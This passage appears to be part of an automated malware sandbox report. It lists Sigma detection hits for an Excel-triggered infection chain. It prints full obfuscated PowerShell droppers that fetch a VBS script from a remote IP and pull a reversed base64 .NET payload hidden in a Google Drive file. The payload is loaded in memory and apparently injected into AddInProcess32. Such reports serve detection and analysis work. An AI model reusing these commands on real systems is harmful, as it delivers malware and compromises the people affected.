4008, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , ProcessId: 3028, ProcessName: wscript.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0n
                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4008, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline", ProcessId: 3328, ProcessName: csc.exe
                Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 5.159.62.244, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3596, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4008, TargetFilename: C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS
                Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3596, Protocol: tcp, SourceIp: 5.159.62.244, SourceIsIpv6: false, SourcePort: 443
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdes
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdes
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4008, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , ProcessId: 3028, ProcessName: wscript.exe
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4008, TargetFilename: C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3596, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", CommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiA
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, 